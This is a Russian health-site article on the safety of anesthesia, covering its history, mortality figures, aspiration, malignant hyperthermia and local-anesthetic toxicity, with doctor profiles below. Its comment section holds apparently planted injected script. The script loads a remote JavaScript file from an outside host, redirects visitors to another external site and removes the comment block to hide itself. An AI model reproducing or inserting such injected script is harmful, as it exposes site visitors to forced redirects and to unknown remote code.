Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Опасен ли наркоз?  >>  Опасен ли наркоз?
 
Обратная связь
 

Опасен ли наркоз?

Размер шрифта
19 октября 2016 00:00
  • google_analytics: false
  • Нравится

«Красный командарм» товарищ Фрунзе скончался во время хирургической операции. Одной из версий его смерти стала индивидуальная непереносимость наркоза. Можно ли сегодня умереть от анестезии?


В 1846-м году американский зубной врач Томас Мортон провел первую операцию под эфирным наркозом. Мортон открыл новую страницу в медицине. С тех пор 16 октября отмечается как неофициальный День анестезиолога.

Самым древним анестетиком был алкоголь – его использовали при операциях еще в Древнем Риме. В дальнейшем применялись такие методы обезболивания, как обкладывание льдом и прижимание сонной артерии (чтобы пациент потерял сознание). Фармакологическая анестезиология началась лишь в XIX веке. Интересно, что в качестве первого местного анестетика использовалось такое вещество, как кокаин.

Суть анестезии в том, что под воздействием препаратов-анестетиков наши клетки теряют возможность создавать динамически упорядоченные связи. Проще говоря, организм больше не реагирует на раздражители так, как должен реагировать, а мозг перестает реагировать на боль так, как делает это обычно.

Существует много мифов и предрассудков об общей анестезии, например, широко распространен слух о том, будто наркоз сокращает срок жизни. На самом деле это не так, но некоторые осложнения при анестезии действительно возможны.


  1. Анестезия безопаснее поездок в автомобиле, но опаснее полетов в самолете. По международной статистике, приблизительно на 250 тысяч операций приходится одна смерть под наркозом. Если сравнить со статистикой аварий, то одна смерть придется на 10 тысяч поездок на автомобиле, и одна – на миллион полетов.

  2. Одна из особенностей общей анестезии – это подавление глоточных и гортанных рефлексов. Человек под наркозом не может глотать, кашлять. Раньше это приводило к серьезным проблемам с дыханием (например, из-за попадания жидкости в дыхательные пути), но сегодня анестезиологи применяют целый комплекс мер, чтобы осложнений не возникало. Используются специальные трубки, а пациент инструктируется перед операцией о том, что он не должен есть и пить.

  3. Изредка общая анестезия дает осложнение, которое называется злокачественная гипертермия. Во время наркоза у генетически предрасположенных пациентов при злокачественной гипертермии нарушаются обменные процессы в мышечной ткани. Это проявляется в виде напряжения мышц, иногда лихорадки и может закончиться смертью. Злокачественная гипертермия – заболевание очень редкое. Не так давно было разработано лекарство, дантролен, которое способно справиться с болезнью, но в нашей стране оно, к сожалению, пока не зарегистрировано. Основной признак развития криза злокачественной гипертермии во время наркоза – это увеличение выделения больным углекислого газа. Болезнь легко диагностируется анестезиологом, если в операционной имеется специальный монитор – капнограф. А что касается «правил для больных» – если у вас бывали неприятные ощущения в мышцах после чашечки крепкого кофе – пожалуйста, не забудьте предупредить об этом вашего анестезиолога!

  4. Осложнения могут быть и при местной анестезии. Препараты для местной анестезии в высоких дозах могут оказаться токсичными. Это приведет к нарушениям сердечного ритма, падению артериального давления или судорогам. Именно поэтому во всех медицинских учреждениях, которые применяют местную анестезию, должно быть оборудование для неотложной помощи. Впрочем, все эти осложнения – большая редкость. Одна из обязанностей врача-анестезиолога и состоит в том, чтобы их не допустить. И вероятность столкнуться с серьезными проблемами из-за анестезии ничтожно мала. Подумайте, насколько хуже было бы делать операции без нее. Смертность от последствий боли и стресса в десятки тысяч раз превышала бы показатели смертности в автомобильной аварии, а многие операции (например, на органах грудной клетки) были бы и вовсе технически невозможны.

«Здоровье инфо» благодарит за помощь в подготовке материала врача анестезиолога-реаниматолога высшей категории, профессора, заведующего кафедрой анестезиологии и реаниматологии имени В.Л. Ваневского Санкт-Петербургской медицинской академии последипломного образования Константина Лебединского.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.